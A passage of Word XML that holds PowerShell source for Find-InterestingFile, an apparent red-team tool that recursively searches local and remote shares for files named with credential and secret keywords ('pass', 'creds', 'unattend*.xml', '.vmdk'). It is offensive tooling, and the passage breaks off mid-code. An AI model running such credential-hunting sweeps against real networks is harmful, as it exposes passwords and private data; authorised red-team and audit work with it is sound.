    </w:p>
    <w:p w14:paraId="1086410F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="097AA416" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-InterestingFile -Path C:\Backup\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F585FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621CB8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns any files on the local path C:\Backup\ that have the default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798A79C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        search term set in the title.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E7872" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="390F8D40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA8FF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E60D32A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-InterestingFile -Path \\WINDOWS7\Users\ -Terms salaries,email -OutFile out.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2391B818" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28502F49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns any files on the remote path \\WINDOWS7\Users\ that have 'salaries'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2732D0B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or 'email' in the title, and writes the results out to a csv file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637D19F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        named 'out.csv'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51595E96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C8E7C21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313CDD73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07084824" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-InterestingFile -Path \\WINDOWS7\Users\ -LastAccessTime (Get-Date).AddDays(-7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C44BDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C9F65BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns any files on the remote path \\WINDOWS7\Users\ that have the default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E87DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        search term set in the title and were accessed within the last week.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7EBCFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B252D59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C497756" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29740D70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64344A71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4518B933" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085C5CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07020F03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750688C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA3E52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Path = '.\',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5855E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="430A15C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Terms')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F16634" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEAC89B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchTerms = @('pass', 'sensitive', 'admin', 'login', 'secret', 'unattend*.xml', '.vmdk', 'creds', 'credential', '.config'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291EDBEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1FE798B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA963A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OfficeDocs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1D834" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35903861" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFB3E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FreshEXEs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5334CC5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B907E3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61472F44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $LastAccessTime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED2663" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5EE65FE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA2D1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LastWriteTime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A17640" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B421803" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A03615" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CreationTime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A479B5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="582059E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C253327" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExcludeFolders,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A284944" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="268F9756" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAD8BB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExcludeHidden,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D5E4A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69B1367A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E83CA6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CheckWriteAccess,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F984DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F6A5D15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E81F02E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OutFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E7F0CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="120DA505" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30805B4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B7270" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA207E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="391530BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB68A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53EA85AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Path += if(!$Path.EndsWith('\')) {"\"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6716B12F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C983D86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D3BA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            $UsePSDrive = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A659CBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773A7478" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="189304D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # append wildcards to the front and back of all search terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CD56A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchTerms = $SearchTerms | ForEach-Object { if($_ -notmatch '^\*.*\*$') {"*$($_)*"} else{$_} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62041747" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51FDDB7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # search just for office documents if specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9CB9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($OfficeDocs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864F5EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SearchTerms = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643AEE78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB50FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FBE696D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # find .exe's accessed within the last 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF55EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($FreshEXEs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F09BC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # get an access time limit of 7 days ago</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994CEA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC7A5D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SearchTerms = '*.exe'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32322184" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C9AD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="580C4A45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($UsePSDrive) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A2D0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're PSDrives, create a temporary mount point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF52D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="654908DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Parts = $Path.split('\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE630E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $FolderPath = $Parts[0..($Parts.length-2)] -join '\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EEB1E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $FilePath = $Parts[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B0C22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="407D56CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2378109A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5021AFC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Mounting path '$Path' using a temp PSDrive at $RandDrive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376111E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21F79B23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307629C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5ECCCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E36494" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469683FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Error mounting path '$Path' : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1752756D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516F9B62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A8CEB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="040E898A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # so we can cd/dir the new drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF24D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Path = "${RandDrive}:\${FilePath}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF40373" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B351BFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F57C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43576734" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1EFDAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EF689C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[*] Search path $Path"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1310460D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="725C2162" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        function Invoke-CheckWrite {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379A370" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # short helper to check is the current user can write to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FDCD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [CmdletBinding()]param([String]$Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50475C06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA23635" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filetest = [IO.FILE]::OpenWrite($Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56067BE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filetest.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CC0EEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C659B47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0102ABF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BECE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose -Message $Error[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C79BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA73DD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB8C49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41B50C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CCB4FBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBF29AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Path' = $Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AEC323" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Recurse' = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29810822" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Force' = $(-not $ExcludeHidden)</w:t>
